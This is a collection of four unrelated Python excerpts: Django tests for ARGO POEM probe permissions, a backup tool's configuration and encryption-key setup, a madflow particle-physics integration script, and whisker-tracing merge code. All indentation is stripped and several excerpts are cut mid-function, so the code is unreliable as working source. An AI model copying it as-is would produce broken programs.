mt = admin_models.MetricTemplate.objects.get(name='argo.AMS-Check')
self.assertEqual(mt.probekey, version)
metric = poem_models.Metric.objects.get(name='argo.AMS-Check')
self.assertEqual(metric.group.name, 'TEST')
self.assertEqual(metric.parent, '')
self.assertEqual(metric.probeexecutable, '["ams-probe"]')
self.assertEqual(metric.probekey, version)
self.assertEqual(
metric.config,
'["maxCheckAttempts 3", "timeout 60", '
'"path /usr/libexec/argo-monitoring/probes/argo", '
'"interval 5", "retryInterval 3"]'
)
self.assertEqual(metric.attribute, '["argo.ams_TOKEN --token"]')
self.assertEqual(metric.dependancy, '')
self.assertEqual(metric.flags, '["OBSESS 1"]')
self.assertEqual(metric.files, '')
self.assertEqual(metric.parameter, '["--project EGI"]')
self.assertEqual(metric.fileparameter, '')
mt_history = poem_models.TenantHistory.objects.filter(
object_repr='argo.AMS-Check'
).order_by('-date_created')
self.assertEqual(mt_history.count(), 1)
self.assertEqual(
mt_history[0].comment, 'Initial version.'
)
serialized_data = json.loads(mt_history[0].serialized_data)[0]['fields']
self.assertEqual(serialized_data['name'], metric.name)
self.assertEqual(serialized_data['mtype'], ['Active'])
self.assertEqual(
serialized_data['probekey'], ['ams-probe', '0.1.11']
)
self.assertEqual(serialized_data['group'], ['TEST'])
self.assertEqual(serialized_data['parent'], metric.parent)
self.assertEqual(
serialized_data['probeexecutable'], metric.probeexecutable
)
self.assertEqual(serialized_data['config'], metric.config)
self.assertEqual(serialized_data['attribute'], metric.attribute)
self.assertEqual(serialized_data['dependancy'], metric.dependancy)
self.assertEqual(serialized_data['flags'], metric.flags)
self.assertEqual(serialized_data['files'], metric.files)
self.assertEqual(serialized_data['parameter'], metric.parameter)
self.assertEqual(serialized_data['fileparameter'], metric.fileparameter)
def test_put_probe_without_new_version_tenant_superuser(self):
data = {
'id': self.probe1.id,
'name': 'ams-probe-new',
'package': 'nagios-plugins-argo (0.1.11)',
'comment': 'Newer version.',
'docurl':
'https://github.com/ARGOeu/nagios-plugins-argo2/blob/'
'master/README.md',
'description': 'Probe is inspecting AMS service.',
'repository': 'https://github.com/ARGOeu/nagios-plugins-'
'argo2',
'update_metrics': False
}
content, content_type = encode_data(data)
request = self.factory.put(self.url, content, content_type=content_type)
request.tenant = self.tenant
force_authenticate(request, user=self.tenant_superuser)
response = self.view(request)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
self.assertEqual(
response.data['detail'],
'You do not have permission to change probes.'
)
probe = admin_models.Probe.objects.get(id=self.probe1.id)
version = admin_models.ProbeHistory.objects.get(
object_id=probe, package=probe.package
)
self.assertEqual(probe.name, 'ams-probe')
self.assertEqual(probe.package, self.package2)
self.assertEqual(probe.comment, 'Newer version.')
self.assertEqual(
probe.docurl,
'https://github.com/ARGOeu/nagios-plugins-argo/blob/master/'
'README.md',
)
self.assertEqual(
probe.description,
'Probe is inspecting AMS service by trying to publish and consume '
'randomly generated messages.'
)
self.assertEqual(
probe.repository, 'https://github.com/ARGOeu/nagios-plugins-argo'
)
self.assertEqual(version.name, probe.name)
self.assertEqual(version.package, probe.package)
self.assertEqual(version.comment, probe.comment)
self.assertEqual(version.docurl, probe.docurl)
self.assertEqual(version.description, probe.description)
self.assertEqual(version.repository, probe.repository)
self.assertEqual(
version.version_comment,
'[{"changed": {"fields": ["package", "comment"]}}]'
)
mt = admin_models.MetricTemplate.objects.get(name='argo.AMS-Check')
self.assertEqual(mt.probekey, version)
metric = poem_models.Metric.objects.get(name='argo.AMS-Check')
self.assertEqual(metric.group.name, 'TEST')
self.assertEqual(metric.parent, '')
self.assertEqual(metric.probeexecutable, '["ams-probe"]')
self.assertEqual(metric.probekey, version)
self.assertEqual(
metric.config,
'["maxCheckAttempts 3", "timeout 60", '
'"path /usr/libexec/argo-monitoring/probes/argo", '
'"interval 5", "retryInterval 3"]'
)
self.assertEqual(metric.attribute, '["argo.ams_TOKEN --token"]')
self.assertEqual(metric.dependancy, '')
self.assertEqual(metric.flags, '["OBSESS 1"]')
self.assertEqual(metric.files, '')
self.assertEqual(metric.parameter, '["--project EGI"]')
self.assertEqual(metric.fileparameter, '')
mt_history = poem_models.TenantHistory.objects.filter(
object_repr='argo.AMS-Check'
).order_by('-date_created')
self.assertEqual(mt_history.count(), 1)
self.assertEqual(
mt_history[0].comment, 'Initial version.'
)
serialized_data = json.loads(mt_history[0].serialized_data)[0]['fields']
self.assertEqual(serialized_data['name'], metric.name)
self.assertEqual(serialized_data['mtype'], ['Active'])
self.assertEqual(
serialized_data['probekey'], ['ams-probe', '0.1.11']
)
self.assertEqual(serialized_data['group'], ['TEST'])
self.assertEqual(serialized_data['parent'], metric.parent)
self.assertEqual(
serialized_data['probeexecutable'], metric.probeexecutable
)
self.assertEqual(serialized_data['config'], metric.config)
self.assertEqual(serialized_data['attribute'], metric.attribute)
self.assertEqual(serialized_data['dependancy'], metric.dependancy)
self.assertEqual(serialized_data['flags'], metric.flags)
self.assertEqual(serialized_data['files'], metric.files)
self.assertEqual(serialized_data['parameter'], metric.parameter)
self.assertEqual(serialized_data['fileparameter'], metric.fileparameter)
def test_put_probe_without_new_version_tenant_user(self):
data = {
'id': self.probe1.id,
'name': 'ams-probe-new',
'package': 'nagios-plugins-argo (0.1.11)',
'comment': 'Newer version.',
'docurl':
'https://github.com/ARGOeu/nagios-plugins-argo2/blob/'
'master/README.md',
'description': 'Probe is inspecting AMS service.',
'repository': 'https://github.com/ARGOeu/nagios-plugins-'
'argo2',
'update_metrics': False
}
content, content_type = encode_data(data)
request = self.factory.put(self.url, content, content_type=content_type)
request.tenant = self.tenant
force_authenticate(request, user=self.tenant_user)
response = self.view(request)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
self.assertEqual(
response.data['detail'],
'You do not have permission to change probes.'
)
probe = admin_models.Probe.objects.get(id=self.probe1.id)
version = admin_models.ProbeHistory.objects.get(
object_id=probe, package=probe.package
)
self.assertEqual(probe.name, 'ams-probe')
self.assertEqual(probe.package, self.package2)
self.assertEqual(probe.comment, 'Newer version.')
self.assertEqual(
probe.docurl,
'https://github.com/ARGOeu/nagios-plugins-argo/blob/master/'
'README.md',
)
self.assertEqual(
probe.description,
'Probe is inspecting AMS service by trying to publish and consume '
'randomly generated messages.'
)
self.assertEqual(
probe.repository, 'https://github.com/ARGOeu/nagios-plugins-argo'
)
self.assertEqual(version.name, probe.name)
self.assertEqual(version.package, probe.package)
self.assertEqual(version.comment, probe.comment)
self.assertEqual(version.docurl, probe.docurl)
self.assertEqual(version.description, probe.description)
self.assertEqual(version.repository, probe.repository)
self.assertEqual(
version.version_comment,
'[{"changed": {"fields": ["package", "comment"]}}]'
)
mt = admin_models.MetricTemplate.objects.get(name='argo.AMS-Check')
self.assertEqual(mt.probekey, version)
metric = poem_models.Metric.objects.get(name='argo.AMS-Check')
self.assertEqual(metric.group.name, 'TEST')
self.assertEqual(metric.parent, '')
| |
"""
:license:
license is described in the LICENSE file provided.
A copy can be accessed in: https://github.com/dev-567/PyBackuper/blob/main/LICENSE
:author:
<NAME>
:packages:
packages used in the project:
- oscrypto
- google-api-python-client google-auth-httplib2 google-auth-oauthlib
You can install these packages using the install.py provided.
"""
import sys
import datetime
import importlib.util as import_util
import logging
import pathlib
import atexit
from . import localstorage
from . import crypto
from . import streamtologger
class App:
APP_NAME = "Backuper"
APP_VERSION = "0.7"
# This value will leave 2048 bytes of extra space, allowing encrypted data (which sometimes
# increase in size) not overflow our max value of 16MB, also included in this 2048, the 3
# bytes we use for the block length info.
# Reason for this max value of 16MB is the use of only 3 bytes to indicate each block length
# in the stream.
BLOCK_SIZE = (2 ** (3 * 8) - 1) - 2048
HASH_DIGEST_LENGTH = 64 # max value for blake2b: 64
HASH_PARTIAL_BLOCK = 123 # used on localstorage.LocalStorage.get_signature()
PACKED_FILE_EXTENSION = ".packed" # used to identify files after localstorage.LocalStorage.pack (compressed and encrypted)
PLAINBYTES_EXTENSION = ".bytes" # used to save files with plain bytes, used for salt and app_key, as they shouldnt be encrypted.
MANIFEST_FILENAME = "manifest" + PACKED_FILE_EXTENSION
APP_KEY_FILENAME = "app_key" + PLAINBYTES_EXTENSION
SALTED_FILENAME = "salted" + PACKED_FILE_EXTENSION
SALT_FILENAME = "salt" + PLAINBYTES_EXTENSION
TOKEN_FILENAME = "token" + PACKED_FILE_EXTENSION
def __init__(self, config_file_path, press_enter_to_finish=False):
"""
:param config_file_path str | pathlib.Path: path pointing to the config file.
:param press_enter_to_finish bool: if True, will wait for press enter input when the script is done.
"""
self.config_file_path = config_file_path
self.press_enter_to_finish = press_enter_to_finish
# config instance: remember if you change this you have to update the
# local_storage and remote_storage versions of the config.
self.config = None # Config instance from config file
self.logger = None # logger used to communicate messages to user/dev
self.local_storage = None
self.remote_storage = None
self.salted_key = None # user key to [de]encrypt user files
self.app_key = None # app key used to [de]encrypt local app files (salted and token, these files are disposables)
assert (
self.BLOCK_SIZE < (2 ** (3 * 8)) - 1
), "BLOCK_SIZE should be lower than 16MB-1 (because of the three length bytes)"
assert (
self.HASH_PARTIAL_BLOCK <= self.BLOCK_SIZE
), "HASH_PARTIAL_BLOCK should be equal or lower than the BLOCK_SIZE"
assert (
self.HASH_DIGEST_LENGTH <= 64
), "HASH_DIGEST_LENGTH should be at max 64, this is the max allowed value for blake2b digest"
atexit.register(self._on_exit)
def _check_config(self, config_instance):
"""
Check if the config structure have the minimum attributes required to proceed.
:param config_instance config_example.Config: any class with those minimum attributes.
"""
keys = (
"local_folder_path",
"remote_folder_path",
"local_manifest_folder_path",
"temp_folder_path",
"log_file_path",
"print_debug_flag",
"fulldebug_flag",
"format_debug_flag",
"save_debug_to_file_flag",
"gdrive_secret_file_path",
"gdrive_save_token_flag",
"gdrive_token_folder_path",
"compression_ratio",
"encryption_save_salted_password_flag",
"encryption_salted_folder_path",
"app_key_folder_path",
)
for key in keys:
if key not in config_instance.__dict__:
raise AttributeError("Attribute {} missing on class.".format(key))
if key.endswith("_path"):
if not isinstance(config_instance.__dict__[key], pathlib.Path):
config_instance.__dict__[key] = pathlib.Path(
config_instance.__dict__[key]
)
# ignore those
if key in ("remote_folder_path"):
continue
# check those if parent folder exists
elif key in ("log_file_path"):
if not config_instance.__dict__[key].parent.exists():
raise AttributeError(
"Folder from path at config_instance.{} doesnt exist.".format(
key
)
)
# everything else check if file exists
elif not config_instance.__dict__[key].exists():
raise AttributeError(
"Path at config_instance.{} doesnt exist.".format(key)
)
elif key.endswith("_flag"):
if type(config_instance.__dict__[key]) is not bool:
raise AttributeError(
"config_instance.{} should be a 'boolean' value.".format(key)
)
elif key == "compression_ratio":
if type(config_instance.__dict__[key]) is not float:
raise AttributeError(
"config_instance.{} should be a 'float' value.".format(key)
)
if not (0.0 <= config_instance.__dict__[key] <= 1.0):
raise AttributeError(
"config_instance.{} should be at the interval 0.0...1.0 (inclusive both).".format(
key
)
)
if not hasattr(config_instance, "filter_function"):
raise AttributeError("Config class should define a filter_function")
def _load_config(self):
"""
Load the self.config_file_path file as a python file where its expected to have a
single class called Config. In this class with expect some attributes as configuration
values for our program. These values are checked on self._check_config. At the end
we have a self.config set and its accessed globally by the application.
"""
# load config module
spec = import_util.spec_from_file_location("config", self.config_file_path)
config_module = import_util.module_from_spec(spec)
spec.loader.exec_module(config_module)
# read config data
self.config = config_module.Config(
module_folder_path=pathlib.Path(__file__).parent,
app_folder_path=pathlib.Path(sys.argv[0]).parent,
config_folder_path=self.config_file_path.parent,
system_tempfolder_path=localstorage.LocalStorage.get_default_tempfolder_path(),
)
self._check_config(self.config)
self.salted_key = None # user key to encrypt user files
self.app_key = None # app key to encrypt app files
def _setup_logger(self):
"""
Setup the self.logger instance used by other classes like: LocalStorage or RemoteStorage.
"""
if self.config.print_debug_flag:
if self.config.fulldebug_flag:
logging.addLevelName(9, "FULLDEBUG")
debug_level = logging.DEBUG - 1 # fulldebug
else:
debug_level = logging.DEBUG # debug
else:
debug_level = logging.INFO # debug disabled
self.logger = logging.getLogger(self.APP_NAME + " " + self.APP_VERSION)
self.logger.setLevel(
logging.NOTSET + 1
) # all inclusive, cant be zero = inactive
if self.config.format_debug_flag:
formatter = logging.Formatter(
"(%(processName)s | %(threadName)s | %(asctime)s | %(levelname)s)\n%(message)s"
)
else:
formatter = logging.Formatter("%(message)s")
if self.config.log_file_path.exists():
if self.config.log_file_path.stat().st_size > 100 * 1024:
log_path_old = self.config.log_file_path.parent / (
self.config.log_file_path.stem
+ "_old"
+ self.config.log_file_path.suffix
)
if log_path_old.exists():
log_path_old.unlink()
self.config.log_file_path.rename(log_path_old)
handler = logging.FileHandler(self.config.log_file_path)
handler.setFormatter(formatter)
# file logging config
# if the flag is off, only save log INFO or above.
handler.setLevel(
debug_level if self.config.save_debug_to_file_flag else logging.INFO
)
self.logger.addHandler(handler)
handler = logging.StreamHandler()
handler.setFormatter(formatter)
# stream/prompt config
handler.setLevel(debug_level) # console logging level
self.logger.addHandler(handler)
if self.config.print_debug_flag:
# only redirect python errors if in debug mode
stderr = streamtologger.StreamToLogger(self.logger, logging.DEBUG)
# do a small test as DEBUG level
stderr.write("Stderr redirect is working.")
stderr.flush()
stderr.level = logging.ERROR # change to ERROR level
sys.stderr = stderr # redirect sys.stderr into StreamToLogger instance
self.logger.info("Logger created.")
def _load_app_key(self):
"""
Load the self.app_key from file (if not found, its randomly generated).
Its supposed to be a key package wide, used by any projects or instances.
This key is used to encrypt local disposable files which is better than leaving
them as plain text.
"""
self.logger.debug("Loading app key...")
key_path = self.config.app_key_folder_path / self.APP_KEY_FILENAME
if not key_path.exists():
self.logger.debug("App key not found, generating...")
self.app_key = crypto.generate_app_key()
self.logger.debug("App key generated, saving...")
with key_path.open("wb") as file:
file.write(self.app_key)
self.logger.debug("App key saved.")
else:
with key_path.open("rb") as file:
self.app_key = file.read()
self.logger.debug("App key loaded.")
def _load_salted_key(self):
"""
Try to load the salted version of password from file, if its not available ask the user,
acquire the salt and apply the salt. Both ways the password is saved on self.salted_key.
:return None:
"""
if self.config.encryption_save_salted_password_flag:
self.logger.debug("Loading salted...")
salted_path = (
self.config.encryption_salted_folder_path / self.SALTED_FILENAME
)
if salted_path.exists():
if not self.remote_storage.has_salt():
self.logger.warn(
"Remote salt doesnt exist, but local salted hash is present.\nIf you lose the salted hash you wont be able to regenerate the same hash without the salt."
)
temp_file_path = self.local_storage.get_new_tempfile()
try:
self.local_storage.unpack(salted_path, temp_file_path, self.app_key)
with temp_file_path.open("rb") as file:
self.salted_key = file.read()
except AttributeError:
self.salted_key = None
self.logger.debug(
"Could not load salted file, type your password again."
)
finally:
self.local_storage.dispose_tempfile(temp_file_path)
self.logger.debug("Salted loaded.")
else:
self.salted_key = None
self.logger.debug("Salted file doesnt exist, type your password again.")
if self.salted_key is None:
self._capture_password_salted()
self.logger.debug("Saving your salted password hash...")
temp_file_path = self.local_storage.get_new_tempfile()
try:
with temp_file_path.open("wb") as file:
file.write(self.salted_key)
self.local_storage.pack(temp_file_path, salted_path, self.app_key)
finally:
self.local_storage.dispose_tempfile(temp_file_path)
self.logger.debug("Password saved.")
else:
self.logger.debug(
"Encryption salted password save/load disabled, capturing and using live..."
)
self._capture_password_salted()
def _capture_password_salted(self):
"""
This function capture the password typed by the user, load and apply the salt (if salt is not
found on remote, its generated and saved). At the end of a succesful execution we have set
the self.salted_key.
"""
while True:
password = input(
"Type your encryption password (min length: 8, type 'e' to exit):"
)
if len(password) == 0:
print("Password cant be empty.")
elif password == "e":
self.logger.debug("Password capture cancelled, exiting.")
self._exit(1)
elif len(password) < 8:
print("Password length need to be at least 8 characters.")
else:
print("Password accepted.")
break
self.logger.debug("Loading salt...")
if self.remote_storage.has_salt():
salt = self.remote_storage.get_salt()
self.logger.debug("Salt loaded.")
else:
self.logger.debug("Salt not found, generating new one...")
salt = crypto.generate_salt()
self.logger.debug("Saving salt...")
self.remote_storage.set_salt(salt)
self.logger.debug("New salt saved.")
self.logger.debug("Generating salted password hash...")
self.salted_key = crypto.apply_salt(password.encode(), salt)
self.logger.debug("Salted password hash generation done.")
def setup(self, remote_storage_type):
"""
Prepare the App to start operating.
Load configs from the Config file, setup loggers used by other classes,
| |
<gh_stars>0
#!/usr/bin/env python3
"""
Example script that goes from the generation of a matrix element
to the integration with the corresponding cuts
The matrix element run by default is: g g > t t~
```
~$ madflow --madgraph_process "g g > t t~"
```
It is possible to apply some mock cuts (pt_min) with the option `--pt_cut` (defaults to 30)
By default the PDF and the strong coupling is computed for muF = muR = sum(mT)/2 but
a fixed value of the scale can be given with --fixed_scale (defaults to 91.46).
LHE files can be produced with the `--histograms` flag.
"""
import re
import sys
import time
import shutil
import tarfile
import requests
import datetime
import itertools
import importlib
import argparse
import tempfile
import subprocess as sp
from pathlib import Path
import logging
import numpy as np
from madflow.custom_op_generator import translate, compile_op
from madflow.config import (
get_madgraph_path,
get_madgraph_exe,
DTYPE,
DTYPEINT,
float_me,
int_me,
run_eager,
guess_events_limit,
)
from madflow.phasespace import PhaseSpaceGenerator
from vegasflow import VegasFlow
from pdfflow import mkPDF
import tensorflow as tf
DEFAULT_PDF = "NNPDF31_nnlo_as_0118"
logger = logging.getLogger(__name__)
# Note that if another process is run, the imports below
# must be changed accordingly, it can be made into options later on
_flav_dict = {"g": 21, "d": 1, "u": 2, "s": 3, "c": 4, "b": 5, "t": 6}
def _read_flav(flav_str):
particle = _flav_dict.get(flav_str[0])
if particle is None:
raise ValueError(
f"Could not understand the incoming flavour: {flav_str} "
"You can skip this error by using --no_pdf"
)
if flav_str[-1] == "~":
particle = -particle
return particle
def _import_module_from_path(path, module_name):
spec = importlib.util.spec_from_file_location(module_name, path)
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
return module
def _generate_madgraph_process(process, output_folder):
"""Given a process string in the madgraph format
ex: g g > t t~
generate the madgraph process file in the appropriate folder
"""
madgraph_script = f"""generate {process}
output pyout {output_folder}
"""
script_path = Path(tempfile.mktemp(prefix="mad_script_"))
script_path.write_text(madgraph_script)
logger.debug("Writing madgraph output script at %s", script_path)
mg5_command = [get_madgraph_exe(), "-f", script_path]
mg5_p = sp.run(mg5_command, capture_output=True, check=True)
# madgraph is not very helpful when the plugin is not found
# so let's "brute force" that information
parsed_output = mg5_p.stdout.decode()
if "initialize a new directory: pyout" in parsed_output:
logger.error(parsed_output)
raise ValueError(
"It seems madgraph was not able to find the pyout plugin. "
f"Please, ensure the plugin is linked to {get_madgraph_path()}/PLUGIN/ "
"For more information visit https://github.com/N3PDF/madflow"
)
logger.debug(parsed_output)
# Since we have finished with -apparent- success, move the script to the output folder
logger.debug("Saving the madgraph script in %s/", output_folder)
# .as_posix() for python < 3.9 compatibility
shutil.move(script_path.as_posix(), output_folder.as_posix())
logger.info("Matrix files written to: %s", output_folder)
def _import_matrices(output_folder):
"""Given a folder with the pyout matrix_xxx.py files,
import them all and instantiate the matrix element and model files"""
sys.path.insert(0, output_folder.as_posix())
re_name = re.compile(r"\w{3,}")
matrices = []
models = []
for i, matrix_file in enumerate(output_folder.glob("matrix_*.py")):
matrix_name = re_name.findall(matrix_file.name)[0]
matrix_module = _import_module_from_path(matrix_file, matrix_name)
# Import specifically the matrix element
matrix_element = getattr(matrix_module, matrix_name.capitalize())
matrices.append(matrix_element())
# Read the parameters of the model, shared among matrix elements
model_sm = get_madgraph_path() / "models/sm"
model = matrix_module.import_ufo.import_model(model_sm.as_posix())
# Instantiate matrix element and models
model_params = matrix_module.get_model_param(
model, (output_folder / "Cards/param_card.dat").as_posix()
)
models.append(model_params)
return matrices, models
def _generate_initial_states(matrices):
"""Reads a list of matrices and outputs a list of tuples of initial states
each element in the list will be a tuple ([flavours hadron 1, flavours hadron 2])
for each matrix
"""
initial_flavours = []
for matrix in matrices:
initials = matrix.initial_states
flavs_1, flavs_2 = zip(*initials)
if matrix.mirror_initial_states:
m2, m1 = zip(*initials)
flavs_1 += m1
flavs_2 += m2
initial_flavours.append((flavs_1, flavs_2))
return initial_flavours
def _autolink(madpath):
"""Links the madflow madgraph plugin into the MG5_aMC directory
If needed it downloads the plugin from the right github directory
"""
try:
madgraph_path = get_madgraph_path(madpath)
except ValueError:
print(
"""> The madgraph path could not be autodiscovered
> Please, set the MADGRAPH_PATH to the madgraph root directory
> Or add the exact path to --autolink (e.g. madflow --autolink /home/mg5)
and don't forget to set `export MADGRAPH_PATH=/path/to/madgraph` in your favourite .rc file!"""
)
sys.exit(0)
# Check whether we already have a plugin there
plugin_path = madgraph_path / "PLUGIN/pyout"
if plugin_path.exists():
print("The plugin folder already exists")
yn = input("Do you want to remove it and link the new one? [y/n] ")
if yn.lower() != "y" and yn.lower() != "yes":
sys.exit(0)
# Don't fully remove it, just move it around
new_path = plugin_path
nn = 0
while new_path.exists():
today_name = datetime.datetime.now().strftime(f".backup-%d-%m-%y-n{nn}")
new_path = new_path.with_suffix(today_name)
nn += 1
plugin_path.rename(new_path)
# If this is a develop setup, link the repository version
test_path = Path(__file__).parent / "../../../madgraph_plugin"
if test_path.exists():
print("Linking in development mode")
plugin_path.symlink_to(test_path)
else:
# Download plugin
latest_plugin = (
"https://github.com/N3PDF/madflow/releases/latest/download/madgraph_plugin.tar.gz"
)
target_path = Path("/tmp/madgraph_plugin.tar.gz")
print(f"Downloading plugin from github repository and untaring to {plugin_path}")
response = requests.get(latest_plugin, stream=True)
if response.status_code == 200:
target_path.write_bytes(response.raw.read())
with tarfile.open(target_path) as tar:
tar.extractall(plugin_path.parent)
print("Linking finished, exiting")
class _MadFlowAutolink(argparse.Action):
"""Wrapper action around _autolink"""
def __init__(self, **kw):
super().__init__(nargs="?", **kw)
def __call__(self, parser, namespace, values, option_string=None):
_autolink(values)
parser.exit(0)
def madflow_main(args=None, quick_return=False):
arger = argparse.ArgumentParser(__doc__)
arger.add_argument("--autolink", help="Link madflow with madgraph", action=_MadFlowAutolink)
arger.add_argument("-v", "--verbose", help="Print extra info", action="store_true")
arger.add_argument("-p", "--pdf", help="PDF set", type=str, default=DEFAULT_PDF)
arger.add_argument(
"--no_pdf", help="Don't use a PDF for the initial state", action="store_true"
)
arger.add_argument(
"--madgraph_process",
help="Set the madgraph process to be run",
type=str,
default="g g > t t~",
)
arger.add_argument(
"-m", "--massive_particles", help="Number of massive particles", type=int, default=2
)
arger.add_argument(
"-q",
"--fixed_scale",
help="Fix value of scale muR=muF (and alphas(q)), "
"if this flag is not provided take dynamical scale q2 = sum(mT)/2",
type=float,
nargs="?",
const=91.46,
)
arger.add_argument(
"-c",
"--pt_cut",
help="Enable a pt cut for the outgoing particles",
type=float,
nargs="?",
const=30.0,
)
arger.add_argument("--histograms", help="Generate LHE files/histograms", action="store_true")
arger.add_argument(
"-i", "--iterations", help="Iterations of vegasfow to run", type=int, default=10
)
arger.add_argument(
"-f", "--frozen_iter", help="Iterations with frozen grid", type=int, default=0
)
arger.add_argument(
"--events_per_device", help="How many events to send to each device", type=int
)
arger.add_argument(
"-o",
"--output",
help="Output folder for the madgraph output",
type=Path,
)
arger.add_argument(
"--dry_run", help="Generate the madgraph output but don't run anything", action="store_true"
)
arger.add_argument(
"--events_per_iteration",
help="How many events to run per iteration",
type=int,
default=int(1e6),
)
arger.add_argument(
"--custom_op", help="Use a Custom Operator for ME evaluation", action="store_true"
)
args = arger.parse_args(args)
if quick_return:
return args, None, None
# LheWriter needs to be imported after --autolink
from madflow.lhe_writer import LheWriter
if args.output is None:
output_path = Path(tempfile.mkdtemp(prefix="mad_"))
else:
output_path = args.output
if output_path.exists():
logger.warning(
"The %s folder is not empty and its content will be removed", output_path
)
yn = input("Do you want to continue? [y/n] ")
if yn.lower() != "y" and yn.lower() != "yes":
sys.exit(0)
_generate_madgraph_process(args.madgraph_process, output_path)
if args.custom_op:
translate(output_path)
compile_op(output_path)
if args.dry_run:
return None, None, None
matrices, models = _import_matrices(output_path)
if args.no_pdf:
initial_flavours = [None]
else:
pdf = mkPDF(args.pdf + "/0")
initial_flavours = _generate_initial_states(matrices)
# Prepare 1) the flavours we will ask pdfflow for
# 2) the indexes for the gathers
flavours_hadron_1, flavours_hadron_2 = zip(*initial_flavours)
# These are passed to pdfflow
hadron_1 = list(set(itertools.chain(*flavours_hadron_1)))
hadron_2 = list(set(itertools.chain(*flavours_hadron_2)))
gather_1 = []
gather_2 = []
for p1, p2 in initial_flavours:
gather_1.append([hadron_1.index(i) for i in p1])
gather_2.append([hadron_2.index(i) for i in p2])
### Set up some parameters for the process
sqrts = 13e3
# The number of particles is the same for all matrices
nparticles = int(matrices[0].nexternal)
ndim = (nparticles - 2) * 4 + 2
massive_particles = args.massive_particles
non_massive = nparticles - massive_particles - 2
# For this script the massive particles go always first
# as the output should always be to particles and not wrappers
# _if_ the number of masses is below the number of massive particle
param_masses = models[0].get_masses()
if len(param_masses) < massive_particles:
param_masses *= massive_particles
param_masses = [i.numpy() for i in param_masses]
masses = param_masses + [0.0] * non_massive
logger.debug("Masses: %s", masses)
###################################################
if args.fixed_scale is None:
logger.info("Set variable muF=muR=sum(mT)/2")
else:
logger.info("Setting fixed muF=muR=%.2f GeV.", args.fixed_scale)
q2 = float_me(args.fixed_scale**2)
if args.no_pdf:
alpha_s = 0.118
else:
alpha_s = np.squeeze(pdf.alphasQ2([q2]))
logger.info("Setting alpha_s = %.4f.", alpha_s)
# Fix all models
for model in models:
model.freeze_alpha_s(alpha_s)
# Create the phase space
phasespace = PhaseSpaceGenerator(nparticles, sqrts, masses, com_output=False)
# Register the cuts with the phase space
if args.pt_cut is not None:
for i in range(2, nparticles):
logger.info("Applying cut of pt > %.2f to particle %d", args.pt_cut, i)
phasespace.register_cut("pt", particle=i, min_val=args.pt_cut)
| |
"""
Author: <NAME>
Date : 2009
Copyright (c) 2009 HHMI. Free downloads and distribution are allowed for any
non-profit research and educational purposes as long as proper credit is given
to the author. All other rights reserved.
"""
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
from builtins import next
from builtins import map
from builtins import zip
from builtins import object
from past.utils import old_div
from numpy import zeros, hypot
from .trace import Whisker_Seg
import pdb
from functools import reduce
def load():
from ui.whiskerdata import load_whiskers, load_trajectories
from ui.genetiff import Reader
#movie = Reader('../../data/seq/whisker_data_0140.seq',adjuststipple=1)
#w,wid = load_whiskers('seq.whiskers')
#w,wid = load_whiskers('whisk-vc/whisk-vc/seq.whiskers')
movie = Reader('../../data/JF8410_041808_001.tif',adjuststipple=1)
w,wid = load_whiskers('test.whiskers')
#w,wid = load_whiskers('results/seq-hand.whiskers')
#t,tid = load_trajectories('results/seq-hand.trajectories')
return w,movie
def merge_all( whiskers, shape, scale = 2 ):
for fid,wvd in whiskers.items():
print(fid)
wv = merge_frame( wvd, shape, scale ).whiskers()
wvd.clear()
wvd.update( [ e for e in enumerate(wv) ] )
def merge_frame( wvd, shape, scale = 2 ):
table = CollisionTable( wvd, shape, scale )
r = Resolution(list(wvd.values()))
#r = Resolution()
m = next(table)
while m:
o = r.add(m, lambda e: len(e)<5 )
table.update(o)
m = next(table)
return r
def breakout( w, bnd ):
left,rest = w.split(bnd[0])
middle,right = rest.split(bnd[1]-bnd[0])
return left, middle, right
def trace_overlap(xxx_todo_changeme, xxx_todo_changeme1, thresh = 2.0 ):
# assumes that indexes run along same direction (i.e. x is monitonically
# increasing along index )
(wa,i) = xxx_todo_changeme
(wb,j) = xxx_todo_changeme1
def dist(ia,ib):
a,b = wa[ia], wb[ib]
return hypot( a[0] - b[0], a[1] - b[1] )
bnda = [i,i]
bndb = [j,j]
ia,ib = i,j
ms = 0
while ms < thresh and ia > 0 and ib > 0:
moves = ( ( ia - 1, ib - 1 ),
( ia - 1, ib ),
( ia , ib - 1 ) )
scores = [dist( iam, ibm ) for iam, ibm in moves]
ms = min(scores)
for idx,s in enumerate( scores ):
if s == ms:
ia,ib = moves[idx]
break
#relax at boundary, move downhill
if ia == 0 and ib == 0:
pass
elif ia == 0:
last = ms
s = dist( ia, ib - 1 )
while s < last and ib > 1:
ib -= 1
last = s
s = dist( ia, ib - 1 )
elif ib == 0:
last = ms
s = dist( ia - 1, ib )
while s < last and ia > 1:
ia -= 1
last = s
s = dist( ia - 1, ib )
bnda[0] = ia
bndb[0] = ib
ia,ib = i,j
ms = 0
while ms < thresh and ia < len(wa)-1 and ib < len(wb)-1:
moves = ( ( ia + 1, ib + 1 ),
( ia + 1, ib ),
( ia , ib + 1 ) )
scores = [dist( iam, ibm ) for iam, ibm in moves]
ms = min(scores)
for idx,s in enumerate(scores):
if s == ms:
ia,ib = moves[idx]
break
#relax at boundary, move downhill
if ia == len(wa)-1 and ib == len(wb)-1:
pass
elif ia == len(wa)-1:
last = ms
s = dist( ia, ib + 1 )
while s < last and ib < len(wb)-2:
ib += 1
last = s
s = dist( ia, ib + 1 )
elif ib == len(wb)-1:
last = ms
s = dist( ia + 1, ib )
while s < last and ia < len(wa)-2:
ia += 1
last = s
s = dist( ia + 1, ib )
bnda[1] = ia
bndb[1] = ib
return bnda, bndb
class Resolution(object):
def __init__(self, whiskers = None, shape = None, scale = 2):
self._paths = set()
self._index = {}
if whiskers:
for w in whiskers:
self._paths.add( (w,) )
self._index[w] = set([(w,)])
def __len__(self):
return len(self._paths)
def iterwhiskers(self):
""" Iterates over paths, yielding the whisker for each path """
join = lambda s,t: Whisker_Seg.join(s,t)
for p in self._paths:
yield reduce( join, p )
def whiskers(self):
return list(self.iterwhiskers())
def add(self, conflicts, prune):
"""
`conflicts` is a match returned from CollisionTable.next() like: ( (whisker,hit), (whisker,hit) )
`prune` is a function mapping whisker segments to a boolean. Will prune if true.
Returns a dict that maps whiskers to corresponding left and right subsegments.
"""
a,b = conflicts
paths,ownership = self.compute_pairwise_conflict_paths( a, b, prune )
paths = set( [self._merge_middles(p) for p in paths] )
